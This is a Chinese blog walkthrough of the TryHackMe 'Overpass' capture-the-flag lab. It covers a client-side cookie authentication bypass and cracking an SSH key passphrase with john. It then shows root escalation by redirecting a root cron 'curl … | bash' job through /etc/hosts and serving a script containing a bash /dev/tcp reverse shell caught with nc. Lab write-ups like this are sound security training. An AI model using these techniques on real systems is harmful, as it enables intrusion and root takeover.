tryhackme-overpass-wp

最新推荐文章于 2024-09-14 17:54:22 发布
最新推荐文章于 2024-09-14 17:54:22 发布
阅读量359 收藏 8
点赞数 10
文章标签: chrome 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73255659/article/details/135969326
版权

文章目录

Tryhackme-Overpass-wp

hello 大家今天是一波 thm的overpass靶场的wp

主机信息探测

从80端口找web漏洞或者ssh爆破,但是ssh爆破难度太大,先看web

web枚举

找到admin目录 可能有身份验证损坏让我们登陆到后台
之后根据提示不用暴力破解 则看到了login.js

身份验证cookie更改

login.js

async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"

两种方法绕过:
方法一: 代码审计发现如果登录返回不是Incorrect credentials则设置cookie
我们可以控制bp 抓登陆的响应包将包的Incorrect credentials修改并且设置302响应>头loaction:/admin
方法二: 直接在控制台修改document.cookie=“SessionToken”

ssh连接

在/admin找到ssh私钥,将私钥保存位rsa,但是要找到私钥的密码可以利用ssh2john 和john破解密码
最后找到私钥密码james13
直接利用ssh登陆

获取user的flag

权限提升

可以看到todo.txt有提示在/etc/crontab中发现有root 权限的脚本
root curl overpass.thm/downloads/src/buildscript.sh | bash
并且/etc/hosts我们可以修改此时就想到我们可以 利用root的cronjob来进行一个反弹shell

思路

将/etc/hosts的 overpass.thm 对应的ip修改为本机的ip
本机开http服务 python -m http.server 80
Ps:
注意本机的网站目录必须是downloads/src/buildscript.sh
并且buildscript.sh 应该修改为bash -i >& /dev/tcp/本机ip/本机端口 0>&!
最后在本机中开启nc -lvp 本机端口开启监听等几秒就会有root的shell连接

总结

overpass1 还是比较简单的主要还是要掌握一些基本的提权方法以及web登陆的相关机制的知识

K1t0
关注
Tryhackme-Overpass
个人博客
09-06 1250
Overpass 文章目录OverpassOverpassTask1 OverpassOverpass 2 - Hackedtask1 Forensics - Analyse the PCAPtask2 Research - Analyse the codetask3 Attack - Get back in!Overpass 3-HostingTask1 Overpass3 - Adventures in Hosting Overpass Task1 Overpass nmap扫描,靶机开启22-ssh
tryhackme--Overpass
qq_45414878的博客
11-16 436
tryhackmeOverpass 用nmap扫描主机,因为前面我已经简单扫过开放的端口了,所以我现在直接放上详细扫描的贴图和命令 nmap -T4 -sS -sV 10.10.220.203 -sC -p 22,80 扫描得到的目录 各种扫描,注入,爆破都试过了,也没有历史漏洞,看了wp才知道是js代码逻辑漏洞,这方面练的太少了,以至于没有找到切入点 async function login() { const usernameBox = document.querySelector("
tryhackme--Overpass 2 - Hacked
qq_45414878的博客
11-05 711
tryhackme--Overpass 2 - HackedTask 1 -Forensics - Analyse the PCAP#1 What was the URL of the page they used to upload a reverse shell?#2 What payload did the attacker use to gain access?#3 What password did the attacker use to privesc?#4 How did the attack
TryHackme-Overpass
Mysmycbx的博客
03-31 172
今天在碰到一个靶机,显示是,但是完全不会,这里写一篇记录一下,保持学习。
nim-overpass:Nim的OpenStreetMap Overpass API库
02-02
**nim-overpass:Nim的OpenStreetMap Overpass API库** `nim-overpass` 是一个用Nim编程...通过阅读nim-overpass的源代码(例如在`nim-overpass-master`目录中),可以深入学习如何使用这个库以及Nim语言的更多细节。
docker-overpass-api:Docker Overpass API
05-25
docker-overpass-api 适用于OpenStreetMap Docker。 构建Docker映像 下载以bzip格式压缩的XML格式的OSM文件,并另存为planet.osm.bz2 。 是一个很好的资源。 curl -o planet.osm.bz2 ...
workshop-geocj2015-overpass
06-03
研讨会 - 立交桥 API - geo-spatial.org Cluj 2015
前端项目-overpass.zip
09-02
该压缩包内的"Overpass-master"文件夹很可能包含了Overpass字体的源代码、预览文件、字体文件(如.OTF或.TTF)以及相关的使用指南或授权文件。开发者可以将这些字体文件集成到自己的Web项目中,通过CSS的`@font-face...
overpass-doc
05-07
overpass-doc支持用于记录Overpass QL查询的标记,以及用于查询集合的程序包元数据。 这些功能将在下一节中介绍。 立交QL文档扩展 .osm overpass-doc处理您的Overpass查询,这些查询另存为带有.osm扩展名的文本文件...
Chrome 本地调试webrtc 获取IP是xxx.local
LCRxxoo的博客
09-11 381
浏览器输入chrome://flags/#enable-webrtc-hide-local-ips-with-mdns 并将属性改为disabled 修改成功后重启浏览器并刷新网页即可
下载chromedriver驱动
2301_79144798的博客
09-12 309
关于ChromeDriver最新下载地址:
谷歌浏览器ChromeDriver 128,129,130驱动下载
事业不等于爱好
09-09 572
ChromeDriver
app抓包 chrome://inspect/#devices
最新发布
朝夕旭潇的博客
09-14 176
1.首先不支持flutter框架,可支持ionic、taro2.初次需要翻墙3.app为debug包,非release。
Flutter之SystemChrome全局设置
nonagontech的博客
09-11 1325
Flutter之SystemChrome全局设置
Chrome和Chromium浏览器有什么不同?
2301_79698214的博客
09-11 515
开源性:Chromium是一个开源项目,而Chrome是基于Chromium开发的。用户可以根据自己的需求选择使用其中之一。代码来源:Chromium是由Google开发的开源项目,而Chrome是由Google基于Chromium浏览器的开源代码进行开发和发布的。总的来说,Chrome和Chromium在功能和使用体验方面有所不同,用户可以根据自己的需求和偏好选择适合自己的浏览器。开发者:Chrome浏览器是由Google开发的,而Chromium浏览器是由Google开源项目维护的。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8458
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
考研复习-英语二真题考试题集-带答案
09-14
英语二考研真题复习资料,带答案版
2024中美独角兽公司发展分析报告.pdf
09-14
全球各大洲独角兽企业分布、中美独角兽企业对比(数量、估值、新增及退榜情况、行业分布、所在城市)、
overpass turbo使用
10-17
Overpass Turbo是一个在线的地理信息系统工具,用于查询和可视化OpenStreetMap(开放街图)的数据。它通过使用Overpass API(一种基于HTTP的接口)来获取OpenStreetMap的数据,并以交互式和可视化的方式呈现查询结果...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值